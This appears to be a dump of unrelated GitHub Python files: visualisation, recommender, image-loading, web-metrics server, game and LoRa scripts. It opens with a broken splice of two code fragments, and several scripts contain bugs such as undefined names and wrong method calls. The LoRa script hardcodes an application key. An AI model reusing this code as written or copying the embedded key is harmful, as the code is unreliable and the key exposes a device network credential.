\ntry:\n N=int(input())\n L=[]\n n=0\n for e in input().split():\n if(n= 0 and s <= 1 and t >= 0 and t <= 1:\n intersectionPoint = [x[1] + (x[2] - x[1])*s, y[1] + (y[2] - y[1])*s]\n return intersectionPoint\n \n return None\n\n# Computes the number of elements of lineSet that line intersects\ndef numLineIntersections(lineSet, line):\n count = 0\n for i in range(len(lineSet)):\n if intersection(lineSet[i], line) != None:\n count += 1\n return count\n \n# This allows us to check if a point is inside a given hull (aka set of lines)\ndef isInsideHull(point, hullLines, padding=1000):\n # First, we extend the line up past the edge of the hull\n highestHullPoint = np.max(hullLines[:,1,0]) + padding\n \n # Format our line as [[x1, x2], [y1, y2]]\n extendedLine = np.array([[point[0], point[0]], [point[1], highestHullPoint]])\n \n intersectionCount = numLineIntersections(hullLines, extendedLine)\n \n # If a line intersects with the boundary of a shape an even number of times\n # in total, it must be outside that shape (think Qext for Gauss's Law)\n if intersectionCount % 2 == 0:\n return False\n\n # Otherwise it is inside\n return True\n\n# This method allows us to get rid of excess lines in the picture\ndef cullVoronoi(vor: Voronoi, communities, hullLines):\n # We can't know how many lines will be good in advance, so we just\n # start with an empty array and append as we go\n goodLines = []\n \n # We iterate over all of the ridges (lines) in the voronoi tessellation\n for k, v in vor.ridge_dict.items():\n # The key will be a tuple with the indices of the two points this line divides\n # The value will be an array with the indices of the two vertices that define the line\n \n # If they are in the same community, we don't need to draw that line\n # Otherwise, we do\n if communities[k[0]] != communities[k[1]]:\n # We don't care about lines that extend to infinity, so ignore those\n # (scipy's library will give -1 as the index of the vertex if it extends to infinity)\n if v[0] == -1 or v[1] == -1:\n pass\n else:\n v1 = vor.vertices[v[0]]\n v2 = vor.vertices[v[1]]\n\n # Make sure that the vertex is actually inside the shape, and not really far away\n if not isInsideHull(v1, hullLines) or not isInsideHull(v2, hullLines):\n pass\n else:\n # Line format: [[x1, x2], [y1, y2]]\n goodLines.append([[v1[0], v2[0]], [v1[1], v2[1]]])\n\n return np.array(goodLines)\n\n\n# Some methods to help visualize things\ndef drawPoints(ax, pointArr, communities, colors, s=10, noaxis=True):\n# for i in range(len(pointArr)):\n# ax.scatter(pointArr[i,0], pointArr[i,1],\n# color=colors[communities[i]], s=s)\n # We can do this a bit more efficiently by coloring all of the points in a given community\n # at once\n for comIndex in range(max(communities)+1):\n pointsInCommunity = pointArr[communities == comIndex]\n ax.scatter(pointsInCommunity[:,0], pointsInCommunity[:,1], color=colors[comIndex], s=s)\n\n if noaxis:\n ax.set_yticks([])\n ax.set_xticks([])\n\ndef drawLines(ax, lines, color='black', opacity=1):\n for i in range(len(lines)):\n ax.plot(lines[i,0], lines[i,1], c=color, alpha=opacity)\n\ndef rgb_to_hex(rgb):\n return '%02x%02x%02x' % rgb\n\ndef genRandomColors(size, seed=21):\n np.random.seed(seed)\n\n randomColors = [f\"#{rgb_to_hex(tuple(np.random.choice(range(256), size=3).flatten()))}\" for i in range(size)]\n\n return randomColors\n\ndef mapPointToColor(point):\n if len(np.shape(point)) == 1:\n # We'll vary red across x, green across y, and blue across both\n # Turns out the trig approach doesn't really work, so we'll just\n # use a (mostly) linear gradient\n #red = int(np.cos(frequencyX*point[0])*127) + 128\n #green = int(np.cos(frequencyY*point[1])*127) + 128\n #blue = int(np.sin(frequencyX*point[0] + frequencyY*point[1])*127) + 128\n # These are just the approximate boundaries of our region\n #extremaX = [640300, 643500]\n #extremaY = [3969000, 3972000]\n #r = int((point[0] - extremaX[0]) / (extremaX[1] - extremaX[0]) * 255)\n #g = int((point[1] - extremaY[0]) / (extremaY[1] - extremaY[0]) * 255)\n #b = int((point[0] % 1000 ) * 128/1000 + (point[1] % 1000 ) * 128/1000)\n seed = int(np.sqrt(point[0]*point[1]/3))\n #print(seed)\n np.random.seed(seed)\n r, g, b = np.random.randint(0, 255, size=3)\n return f'#{rgb_to_hex(tuple([r,g,b]))}'\n\n # Otherwise recurse to retrieve list of colors\n colors = []\n for i in range(len(point)):\n colors.append(mapPointToColor(point[i]))\n\n return colors\n \n","repo_name":"Jfeatherstone/CommunityDetectionVis","sub_path":"vis/Visualization.py","file_name":"Visualization.py","file_ext":"py","file_size_in_byte":6005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70272873051","text":"import numpy as np\r\nimport pandas as pd\r\nimport scipy\r\nfrom scipy import spatial\r\n\r\nclass CollaborativeFilter:\r\n def __init__(self, dataframe, colItems, colUsers):\r\n self.dataframe = dataframe\r\n self.colItems = colItems\r\n self.colUsers = colUsers\r\n self.cleanDF = self.cleanDataframe()\r\n\r\n # Simplify dataframe to only contain users and items that they have viewed, and remove duplicates\r\n def cleanDataframe(self):\r\n itemUserDF = self.dataframe[[self.colItems, self.colUsers]]\r\n return itemUserDF.drop_duplicates()\r\n\r\n # Gets list of all unique users from filtered criteria\r\n def getUserList(self):\r\n userList = list(set(self.cleanDF[self.colUsers]))\r\n return userList\r\n\r\n # Gets list of all unique items from filtered criteria\r\n def getItemList(self):\r\n itemUserDict = self.cleanDF.groupby(self.colItems)[self.colUsers].apply(list).to_dict()\r\n itemList = [item for item in itemUserDict]\r\n return itemList\r\n\r\n # Builds a matrix denoting the items and which users have viewed them\r\n # Each row is a unique user and a binary 0-1 entry for whether a user (column) has\r\n # viewed the item or not\r\n def buildItemUserMatrix(self):\r\n userList = self.getUserList()\r\n itemList = self.getItemList()\r\n\r\n itemUserDict = self.cleanDF.groupby(self.colItems)[self.colUsers].apply(list).to_dict()\r\n userIndexDict = dict(zip(userList, range(len(userList))))\r\n\r\n itemUserMatrix = []\r\n nUsers = len(userList)\r\n for item in itemList:\r\n itemVector = np.zeros(nUsers, dtype=np.int)\r\n userIdList = itemUserDict.get(item)\r\n userIndices = [userIndexDict.get(user) for user in userIdList]\r\n itemVector[userIndices] = 1\r\n itemUserMatrix.append(itemVector)\r\n return itemUserMatrix, itemList, userList\r\n\r\n # Constructs a square similarity matrix for similarities between all items\r\n def buildSimilarityMatrix(self, itemUserMatrix, metric=\"cosine\"):\r\n nItems = len(itemUserMatrix)\r\n simMatrix = np.zeros([nItems, nItems])\r\n\r\n for i in range(nItems):\r\n for j in range(nItems):\r\n itemViews1 = itemUserMatrix[i]\r\n itemViews2 = itemUserMatrix[j]\r\n\r\n if metric == \"cosine\":\r\n itemSimilarity = self.calculateCosineSimilarity(itemViews1, itemViews2)\r\n elif metric == \"pearson\":\r\n itemSimilarity = self.calculatePearsonCorrelation(itemViews1, itemViews2)\r\n elif metric == \"spearman\":\r\n itemSimilarity = self.calculateSpearmanRankCorrelation(itemViews1, itemViews2)\r\n elif metric == \"euclidean\":\r\n itemSimilarity = self.calculateEuclideanSimilarity(itemViews1, itemViews2)\r\n else:\r\n print(\"# Error: Invalid similarity metric specified #\")\r\n simMatrix[i][j] = itemSimilarity\r\n if i % 100 == 0: print(\"Sim matrix progress: \", i, \"/\", nItems)\r\n\r\n return simMatrix\r\n\r\n # Generates a list of recommendations for a user\r\n # Proposed list of items are most similar to the items that the user previously viewed\r\n def makeRecommendation(self, user, itemList, similarityMatrix, nRecommend):\r\n viewedItems = self.cleanDF[self.cleanDF[self.colUsers] == user][self.colItems]\r\n viewedIndices = [itemList.index(vi) for vi in viewedItems] # Finds index of viewed items in itemList\r\n simRows = [similarityMatrix[vid] for vid in viewedIndices]\r\n colSums = np.sum(simRows, 0)\r\n\r\n for vi in sorted(viewedIndices, reverse=True):\r\n colSums[vi] = 0\r\n\r\n nearestItemIndices = np.argsort(-colSums)\r\n recomItemIndices = nearestItemIndices[:nRecommend]\r\n recomItems = [itemList[i] for i in recomItemIndices]\r\n\r\n return recomItems\r\n\r\n def createRecommenderDict(self, userList, itemList, similarityMatrix, nRecommend):\r\n recommenderDict = {}\r\n for user in userList:\r\n recomItems = self.makeRecommendation(user, itemList, similarityMatrix, nRecommend)\r\n recommenderDict[user] = recomItems\r\n\r\n return recommenderDict\r\n\r\n\r\n def calculateCosineSimilarity(self, vec1, vec2):\r\n cosDistance = spatial.distance.cosine(vec1, vec2)\r\n itemSimilarity = 1 - cosDistance\r\n return itemSimilarity\r\n\r\n\r\n def calculatePearsonCorrelation(self, vec1, vec2):\r\n pearsonCorrelation = scipy.stats.pearsonr(vec1, vec2)\r\n return pearsonCorrelation[0]\r\n\r\n\r\n def calculateSpearmanRankCorrelation(self, vec1, vec2):\r\n spearmanCorrelation = scipy.stats.spearmanr(vec1, vec2)\r\n return spearmanCorrelation[0]\r\n\r\n\r\n def calculateEuclideanSimilarity(self, vec1, vec2):\r\n euclideanDistance = spatial.distance.euclidean(vec1, vec2)\r\n itemSimilarity = 1 - euclideanDistance\r\n return itemSimilarity\r\n","repo_name":"dan-lin/AdaptiveHybridRS","sub_path":"CollaborativeFilter.py","file_name":"CollaborativeFilter.py","file_ext":"py","file_size_in_byte":4997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"538848042","text":"import requests\n\nfrom file_operations import download_image, get_file_extension_from_link\n\nLAUNCH_ID = \"6243ad8baf52800c6e919252\"\nIMAGES_DIR = \"images/\"\n\n\ndef fetch_spacex_launch(launch_id: str) -> None:\n \"\"\"fetch sacex launch by launch_id\"\"\"\n response = requests.get(\n url=f\"https://api.spacexdata.com/v4/launches/{launch_id}\"\n )\n spacex_launches = response.json()\n spacex_image_links = spacex_launches[\"links\"][\"flickr\"][\"original\"]\n for index, link in enumerate(spacex_image_links, start=1):\n download_image(\n url=link,\n path=IMAGES_DIR,\n name=f\"spacex_launch_{launch_id}_{index}{get_file_extension_from_link(link)}\"\n )\n\n\ndef main():\n fetch_spacex_launch(LAUNCH_ID)\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"VrHb/Astrophoto_collecting","sub_path":"fetch_spacex.py","file_name":"fetch_spacex.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42817013144","text":"from skimage import io, transform\nfrom PIL import Image\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport pickle\n\nimg_width = 224\nimg_height = 224\npickle_load_file = open('./Data/pickledata/train_and_vali_file_list.pkl', 'rb')\ntemp_list = pickle.load(pickle_load_file)\ntrain_file_list, vali_file_list = temp_list[0], temp_list[1]\ntrain_file_len, vali_file_len = len(train_file_list), len(vali_file_list)\nprint(train_file_len,vali_file_len)\nclasses_list = temp_list[2]\nclasses_new_list = temp_list[3]\nclasses_new_dict = {item:index for index, item in enumerate(classes_new_list)}\nattribute_list = temp_list[4]\nattribute_bi_dict = temp_list[5]\nattribute_conti_dict = temp_list[6]\n\nattribute_list_all = np.zeros((25,85))\n\nfor index, each_class in enumerate(classes_new_list):\n\tattribute_list_all[index,:] = attribute_bi_dict[each_class]\n\nattribute_list_all = attribute_list_all.astype('float32')\n\nword2vec_load_file = open('./glove/word2vec_pickle.pkl','rb')\nword2vec_list = pickle.load(word2vec_load_file)\nword2vec_50 = word2vec_list[0]\nword2vec_100 = word2vec_list[1]\nword2vec_200 = word2vec_list[2]\nword2vec_300 = word2vec_list[3]\n\ndef image2tensor(image_path_name):\n\timg = mpimg.imread(image_path_name)\n\tnew_image = transform.resize(img, (img_width, img_height))\n\t# new_image_ = np.asarray(new_image)\n\t# new_image = tf.convert_to_tensor(new_image)\n\treturn new_image\n\ndef glove(word, vec_length):\n\tif vec_length == 50:\n\t\ttry:\n\t\t\tword2vec = np.array(word2vec_50[word])\n\t\texcept KeyError:\n\t\t\tword2vec = np.zeros(50)\n\telif vec_length == 100:\n\t\ttry:\n\t\t\tword2vec = np.array(word2vec_100[word])\n\t\texcept KeyError:\n\t\t\tword2vec = np.zeros(100)\n\telif vec_length == 200:\n\t\ttry:\n\t\t\tword2vec = np.array(word2vec_200[word])\n\t\texcept KeyError:\n\t\t\tword2vec = np.zeros(200)\n\telif vec_length == 300:\n\t\ttry:\n\t\t\tword2vec = np.array(word2vec_300[word])\n\t\texcept KeyError:\n\t\t\tword2vec = np.zeros(300)\n\telse:\n\t\tprint('vec_length should be 50, 100, 200, or 300!')\n\t\treturn 0\n\treturn word2vec\n\n\n\ndef Get_next_batch(Train_or_Vali, batch_size, epoch, use_word2vec=0, attribute = 'conti'):\n\t\"\"\"\n\tGet next batch according to size.\n\t:param Train_or_Vali: Whether to train or validate the model.\n\t:param batch_size: The size of the training batch.\n\t:param use_word2vec: If use the word2vec feature as an attribute\n\t:return: training data, shape = [batch_size, img_width, img_height, img_path],\n\tattribute, shape = [batch_size, attribute_length]\n\tand label(one-hot), shape = [batch_size, num_classes]\n\tfor next batch, type = np.array.\n\t\"\"\"\n\timg_batch_tensor = np.zeros((batch_size, img_width, img_height, 3))\n\tif not use_word2vec:\n\t\tattribute_batch_tensor = np.ndarray((batch_size, 85))\n\telse:\n\t\tattribute_batch_tensor = np.ndarray((batch_size, 85 + use_word2vec))\n\t# if not use_all_label:\n\t# \tlabel_batch_tensor = np.ndarray((batch_size, 20))\n\t# else:\n\tlabel_batch_tensor = np.zeros((batch_size, 25))\n\n\n\tif Train_or_Vali == 'train':\n\t\timg_path = './Data/train_zsl/'\n\t\tfor batch in range(batch_size):\n\t\t\tfile_name = train_file_list[(batch_size*epoch + batch)%train_file_len]\n\t\t\timg_batch_tensor[batch] = image2tensor(img_path + file_name)\n\t\t\tlabel_name = file_name.split('_')[0]\n\t\t\tif attribute == 'bi':\n\t\t\t\tif not use_word2vec:\n\t\t\t\t\tattribute_batch_tensor[batch] = attribute_bi_dict[label_name]\n\t\t\t\telse:\n\t\t\t\t\tattribute_batch_tensor[batch][:85] = attribute_bi_dict[label_name]\n\t\t\t\t\tattribute_batch_tensor[batch][85:] = glove(label_name,use_word2vec)\n\t\t\telif attribute == 'conti':\n\t\t\t\tif not use_word2vec:\n\t\t\t\t\tattribute_batch_tensor[batch] = attribute_conti_dict[label_name]\n\t\t\t\telse:\n\t\t\t\t\tattribute_batch_tensor[batch][:85] = attribute_conti_dict[label_name]\n\t\t\t\t\tattribute_batch_tensor[batch][85:] = glove(label_name,use_word2vec)\n\t\t\tlabel_batch_tensor[batch][classes_new_dict[label_name]] = 1 \n\n\telif Train_or_Vali == 'validation':\n\t\timg_path = './Data/validation_zsl/'\n\t\tfor batch in range(batch_size):\n\t\t\tfile_name = vali_file_list[(batch_size*epoch + batch)%vali_file_len]\n\t\t\timg_batch_tensor[batch] = image2tensor(img_path + file_name)\n\t\t\tlabel_name = file_name.split('_')[0]\n\t\t\tif attribute == 'bi':\n\t\t\t\tif not use_word2vec:\n\t\t\t\t\tattribute_batch_tensor[batch] = attribute_bi_dict[label_name]\n\t\t\t\telse:\n\t\t\t\t\tattribute_batch_tensor[batch][:85] = attribute_bi_dict[label_name]\n\t\t\t\t\tattribute_batch_tensor[batch][85:] = glove(label_name,use_word2vec)\n\t\t\telif attribute == 'conti':\n\t\t\t\tif not use_word2vec:\n\t\t\t\t\tattribute_batch_tensor[batch] = attribute_conti_dict[label_name]\n\t\t\t\telse:\n\t\t\t\t\tattribute_batch_tensor[batch][:85] = attribute_conti_dict[label_name]\n\t\t\t\t\tattribute_batch_tensor[batch][85:] = glove(label_name,use_word2vec)\n\t\t\tlabel_batch_tensor[batch][classes_new_dict[label_name]] = 1\n\telse:\n\t\tprint(\"ERROR!You should input train or validation\")\n\n\treturn img_batch_tensor.astype('float32'), attribute_batch_tensor.astype('float32'), label_batch_tensor.astype('float32')\n\ndef main():\n\tprint('test:')\n\tprint('*' * 30)\n\timage_name = 'pic1.jpg'\n\tresult = image2tensor(image_name)\n\tGet_next_batch('train', 2, 1)\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"ChengzheXu/exercise_ZSL","sub_path":"Code/image_data_handle.py","file_name":"image_data_handle.py","file_ext":"py","file_size_in_byte":5096,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"32"} +{"seq_id":"38136523337","text":"def crear_modeloEmbeddings():\n from tensorflow.keras import optimizers\n from tensorflow.keras.models import Sequential\n from tensorflow.keras.layers import Dropout, Flatten, Dense, Activation\n from tensorflow.keras.layers import BatchNormalization\n from tensorflow.keras.layers import Convolution2D, MaxPooling2D\n from tensorflow.keras import backend as K\n longitud, altura = 250, 250\n filtrosConv1 = 32\n filtrosConv2 = 64\n tamano_filtro1 = (3, 3)\n tamano_filtro2 = (2, 2)\n tamano_pool = (2, 2)\n clases = 2\n lr = 0.0004\n\n cnn = Sequential()\n cnn.add(Convolution2D(filtrosConv1, tamano_filtro1, padding =\"same\", input_shape=(longitud, altura, 3), activation='relu'))\n cnn.add(MaxPooling2D(pool_size=tamano_pool))\n\n cnn.add(Convolution2D(filtrosConv2, tamano_filtro2, padding =\"same\"))\n cnn.add(MaxPooling2D(pool_size=tamano_pool))\n\n cnn.add(Convolution2D(filtrosConv2, tamano_filtro2, padding =\"same\"))\n cnn.add(MaxPooling2D(pool_size=tamano_pool))\n\n cnn.add(Flatten())\n cnn.add(Dense(256, activation='relu'))\n\n cnn.add(Dense(128, activation='relu'))\n\n cnn.add(Dense(64, activation='relu'))\n cnn.add(BatchNormalization())\n\n cnn.add(Dense(clases, activation='softmax'))\n\n cnn.compile(loss='binary_crossentropy',\n optimizer=optimizers.Adam(\n learning_rate=lr,\n ),\n metrics=['accuracy'])\n\n return cnn","repo_name":"jmurillo064/servicioRoya","sub_path":"utiles.py","file_name":"utiles.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25532294310","text":"import threading\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nimport time\nimport csv\nimport os\n\nnavigationTime= {'fetchTime':0 , 'workerTime':0 , 'totalTime':0, 'downloadTime':0, 'timeToFirstByte':0, 'headerSize':0, 'dnsLookupTime': 0}\nnetworkInf = {'downlink': 0, 'effectiveType': 0, 'rtt':0, 'saveData':False}\nstorageEstimate = {'quota':0, 'usage':0, 'caches':0, 'indexedDB':0, 'serviceWorker':0}\nfpResult = {'fp':0}\nfcpResult = {'fcp':0}\nfidResult = {'fid':0}\nlcpResult = {'lcp':0}\nclsResult = {'cls':0}\ntbtResult = {'tbt':0}\nhttpd = 0\n\nclass TestHandler(BaseHTTPRequestHandler):\n\n def do_POST(self):\n length = int(self.headers['Content-Length']) # <--- Gets the size of data\n data_string = self.rfile.read(length)\n data_string = data_string.decode(\"utf-8\")\n print(\"\\nTEST\\n\")\n if 'perfumeResults' in data_string:\n print(data_string)\n if 'navigationTiming' in data_string:\n navigationTime['fetchTime'] = data_string.split(\"fetchTime\\\":\")[1].split(\",\\\"workerTime\")[0]\n navigationTime['workerTime'] = data_string.split(\"workerTime\\\":\")[1].split(\",\\\"totalTime\")[0]\n navigationTime['totalTime'] = data_string.split(\"totalTime\\\":\")[1].split(\",\\\"downloadTime\")[0]\n navigationTime['downloadTime'] = data_string.split(\"downloadTime\\\":\")[1].split(\",\\\"timeToFirstByte\")[0]\n navigationTime['timeToFirstByte'] = data_string.split(\"timeToFirstByte\\\":\")[1].split(\",\\\"headerSize\")[0]\n navigationTime['headerSize'] = data_string.split(\"headerSize\\\":\")[1].split(\",\\\"dnsLookupTime\")[0]\n navigationTime['dnsLookupTime'] = data_string.split(\"dnsLookupTime\\\":\")[1].split(\"},\\\"eventProperties\",1)[0]\n\n #if 'networkInformation' in data_string:\n # networkInf['downlink'] = data_string.split(\"downlink\\\":\")[1].split(\",\\\"effectiveType\")[0]\n # networkInf['effectiveType'] = data_string.split(\"effectiveType\\\":\\\"\")[1].split(\"\\\",\\\"rtt\")[0]\n # networkInf['rtt'] = data_string.split(\"rtt\\\":\")[1].split(\",\\\"saveData\")[0]\n # networkInf['saveData'] = data_string.split(\"saveData\\\":\")[1].split(\"},\\\"eventProperties\",1)[0]\n\n if 'storageEstimate' in data_string:\n storageEstimate['quota'] = data_string.split(\"quota\\\":\")[1].split(\",\\\"usage\")[0]\n storageEstimate['usage'] = data_string.split(\"usage\\\":\")[1].split(\",\\\"caches\")[0]\n storageEstimate['caches'] = data_string.split(\"caches\\\":\")[1].split(\",\\\"indexedDB\")[0]\n storageEstimate['indexedDB'] = data_string.split(\"indexedDB\\\":\")[1].split(\",\\\"serviceWorker\")[0]\n storageEstimate['serviceWorker'] = data_string.split(\"serviceWorker\\\":\")[1].split(\"},\\\"eventProperties\",1)[0]\n\n if 'fp' in data_string:\n fpResult['fp'] = data_string.split(\"fp\\\",\\\"data\\\":\")[1].split(\",\\\"eventProperties\",1)[0]\n\n if 'fcp' in data_string:\n fcpResult['fcp'] = data_string.split(\"fcp\\\",\\\"data\\\":\")[1].split(\",\\\"eventProperties\",1)[0]\n\n if 'fid' in data_string:\n fidResult['fid'] = data_string.split(\"fid\\\",\\\"data\\\":\")[1].split(\",\\\"eventProperties\",1)[0]\n\n if 'lcp' in data_string:\n lcpResult['lcp'] = data_string.split(\"lcp\\\",\\\"data\\\":\")[1].split(\",\\\"eventProperties\",1)[0]\n\n if 'cls' in data_string:\n clsResult['cls'] = data_string.split(\"cls\\\",\\\"data\\\":\")[1].split(\",\\\"eventProperties\",1)[0]\n\n if 'tbt' in data_string:\n tbtResult['tbt'] = data_string.split(\"tbt\\\",\\\"data\\\":\")[1].split(\",\\\"eventProperties\",1)[0]\n\n outputDir = \"output\"\n\n if not os.path.exists(outputDir):\n os.makedirs(outputDir)\n else:\n print(\"The file already exists\")\n try:\n file2 = open(outputDir + '/MyFile2_results_{}.txt'.format(time.strftime('%Y.%m.%d_%H%M%S')),\"w+\")\n file2.write(data_string)\n with open(outputDir + '/navigationTiming_results_{}.csv'.format(time.strftime('%Y.%m.%d_%H%M%S')), 'w') as f: # Just use 'w' mode in 3.x 'w' mode in 3.x\n w = csv.DictWriter(f, navigationTime.keys())\n w.writeheader()\n w.writerow(navigationTime)\n #with open(outputDir + '/networkInformation_results_{}.csv'.format(time.strftime('%Y.%m.%d_%H%M%S')), 'w') as f: # Just use 'w' mode in 3.x 'w' mode in 3.x\n # w = csv.DictWriter(f, networkInf.keys())\n # w.writeheader()\n # w.writerow(networkInf)\n with open(outputDir + '/storageEstimate_results_{}.csv'.format(time.strftime('%Y.%m.%d_%H%M%S')), 'w') as f: # Just use 'w' mode in 3.x 'w' mode in 3.x\n w = csv.DictWriter(f, storageEstimate.keys())\n w.writeheader()\n w.writerow(storageEstimate)\n with open(outputDir + '/fp_results_{}.csv'.format(time.strftime('%Y.%m.%d_%H%M%S')), 'w') as f: # Just use 'w' mode in 3.x 'w' mode in 3.x\n w = csv.DictWriter(f, fpResult.keys())\n w.writeheader()\n w.writerow(fpResult)\n with open(outputDir + '/fcp_results_{}.csv'.format(time.strftime('%Y.%m.%d_%H%M%S')), 'w') as f: # Just use 'w' mode in 3.x 'w' mode in 3.x\n w = csv.DictWriter(f, fcpResult.keys())\n w.writeheader()\n w.writerow(fcpResult)\n with open(outputDir + '/fid_results_{}.csv'.format(time.strftime('%Y.%m.%d_%H%M%S')), 'w') as f: # Just use 'w' mode in 3.x 'w' mode in 3.x\n w = csv.DictWriter(f, fidResult.keys())\n w.writeheader()\n w.writerow(fidResult)\n with open(outputDir + '/lcp_results_{}.csv'.format(time.strftime('%Y.%m.%d_%H%M%S')), 'w') as f: # Just use 'w' mode in 3.x 'w' mode in 3.x\n w = csv.DictWriter(f, lcpResult.keys())\n w.writeheader()\n w.writerow(lcpResult)\n with open(outputDir + '/cls_results_{}.csv'.format(time.strftime('%Y.%m.%d_%H%M%S')), 'w') as f: # Just use 'w' mode in 3.x 'w' mode in 3.x\n w = csv.DictWriter(f, clsResult.keys())\n w.writeheader()\n w.writerow(clsResult)\n with open(outputDir + '/tbt_results_{}.csv'.format(time.strftime('%Y.%m.%d_%H%M%S')), 'w') as f: # Just use 'w' mode in 3.x 'w' mode in 3.x\n w = csv.DictWriter(f, tbtResult.keys())\n w.writeheader()\n w.writerow(tbtResult)\n\n print(data_string)\n\n except:\n print('error')\n\n if \"load\" in data_string:\n load_time = data_string.split(\"load\\\":\")[1].split(\"}]}\")[0]\n print(outputDir + '/loadTime_results_{}.csv'.format(time.strftime('%Y.%m.%d_%H%M%S')))\n with open(outputDir + '/loadTime_results_{}.csv'.format(time.strftime('%Y.%m.%d_%H%M%S')), 'w') as f: # Just use 'w' mode in 3.x 'w' mode in 3.x\n w = csv.writer(f, delimiter=\"\\n\")\n w.writerow([\"load_time\"])\n w.writerow([load_time])\n\n self.wfile.write(b'')\n\ndef start_server():\n \"\"\"Start the server.\"\"\"\n server_address = ('', 8080)\n global httpd\n httpd = HTTPServer(server_address, TestHandler)\n print(\"Serving on CWD: \" + os.getcwd())\n httpd.serve_forever()\n\ndef stop_server():\n \"\"\"Stop the server.\"\"\"\n global httpd\n httpd.server_close()\n\nif __name__ == '__main__':\n start_server()\n sleep(10)\n stop_server()\n","repo_name":"HermanKelder/GreenLabProject","sub_path":"scripts/NewServer.py","file_name":"NewServer.py","file_ext":"py","file_size_in_byte":7688,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"25434803332","text":"file = open(\"input/day-17-input.txt\")\nlines = file.readlines()[0].strip()\n\ntrench_y = lines.find(\"y\")\ntrench_x = list(map(lambda n : int(n), lines[15:trench_y - 2].split(\"..\")))\ntrench_y = list(map(lambda n : int(n) ,lines[trench_y + 2:].split(\"..\")))\n\nmax_ys = []\n\nfor x in range(1, trench_x[1] + 1):\n for y in range(-1000, 1000):\n x_change, y_change = x, y\n x_pos, y_pos = 0, 0\n y_max = 0\n while x_pos <= trench_x[1] and y_pos >= trench_y[0]:\n x_pos += x_change\n y_pos += y_change\n x_change = x_change - 1 if x_change > 0 else 0\n y_change -= 1\n y_max = max(y_pos, y_max)\n\n if trench_x[0] <= x_pos <= trench_x[1] and trench_y[0] <= y_pos <= trench_y[1]:\n max_ys.append(y_max)\n break\n\nresult = max(max_ys)\nprint(\"highest y position: {}\".format(result)) # part 1\nprint(\"number of initial velocities: {}\".format(len(max_ys))) # part 2\n","repo_name":"xiongjya/aoc-2021","sub_path":"src/day-17/day-17-0.py","file_name":"day-17-0.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"7736303497","text":"\nimport simplejson, socket, sys, pyglet\nfrom . import settings\nfrom . import game\n \nclass Window(pyglet.window.Window):\n keys = None\n game = None\n \n def __init__(self, *args, **kwargs):\n\t #initialise window for messaging\n pyglet.window.Window.__init__(self, *args, **kwargs)\n self.game = game.Game(boolMultiplayer=True)\n self.keys = pyglet.window.key.KeyStateHandler()\n self.pushHandlers(self.keys)\n \n def moveuser(self, dx, dy):\n user = self.game.userMe\n user.move(0, dy, y_bounds=(0, settings.WINDOW_HEIGHT - user.height))\n \n def parseKeys(self):\n dy = (settings.MOVE_SPEED if self.keys[pyglet.window.key.UP] else 0) \\\n + (-settings.MOVE_SPEED if self.keys[pyglet.window.key.DOWN] else 0)\n self.moveuser(0, dy)\n \n def MouseScroll(self, x, y, scrollX, scrollY):\n self.moveuser(scrollX * settings.MOVE_SPEED, scrollY * settings.MOVE_SPEED)\n \n def on_draw(self):\n self.clear()\n self.parse_keys()\n self.game.draw()\n self.game.debug_text.draw()\n self.game.ball.draw()\n self.game.score.draw()\n self.game.userLeft.draw()\n self.game.userRight.draw()\n","repo_name":"ashwin2000/Pong-game","sub_path":"src/window.py","file_name":"window.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"21517862138","text":"#!/usr/bin/python3\n\"\"\"Alta3 Research - Exploring OpenAPIs with requests\"\"\"\n# documentation for this API is at\n# https://anapioficeandfire.com/Documentation\n\nimport requests\nimport pprint\n\nAOIF_CHAR = \"https://www.anapioficeandfire.com/api/characters/\"\n\ndef main():\n ## Ask user for input\n got_charToLookup = input(\"Pick a number between 1 and 1000 to return info on a GoT character! \" )\n\n ## Send HTTPS GET to the API of ICE and Fire character resource\n gotresp = requests.get(AOIF_CHAR + got_charToLookup)\n\n ## Decode the response\n got_dj = gotresp.json()\n #pprint.pprint(got_dj)\n\n #CODE CUSTOMIZATION 01\n allegiance = (got_dj['allegiances'])\n #print(allegiance)\n #print(got_dj['allegiances'])\n print(\"Books: \"+got_dj['books'])\n print(\"allegiances: \"+ allegiances)\n gothouselookup = requests.get(allegiance)\n print(\"gothouselookup\"+gothouselookup)\n got_house = gothouselookup.json()\n print(\"house of the character: \"+got_house['name'])\n \n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"VimalaJMelan/mycode","sub_path":"iceAndFire04.py","file_name":"iceAndFire04.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11340682825","text":"from network import LoRa\nimport socket\nimport ubinascii\nimport binascii\nimport struct\nimport machine\nimport time\nimport uos\n# Initialise LoRa in LORAWAN mode.\n# Please pick the region that matches where you are using the device:\n# Asia = LoRa.AS923\n# Australia = LoRa.AU915\n# Europe = LoRa.EU868\n# United States = LoRa.US915\n#lora = LoRa(mode=LoRa.LORAWAN, region=LoRa.AU915)\n\nlora = LoRa(mode=LoRa.LORAWAN, region=LoRa.AU915, adr=True, tx_retries=0, device_class=LoRa.CLASS_A)\nAPP_EUI = '406d23713c2de17a'\nAPP_KEY = 'dae41ee5789b7cc4bdd10a0799df6a7d'\n\n# remove default channels\nfor i in range(0, 72):\n lora.remove_channel(i)\n\n# adding the Australian channels\nprint(\"add channels\")\nfor i in range(0, 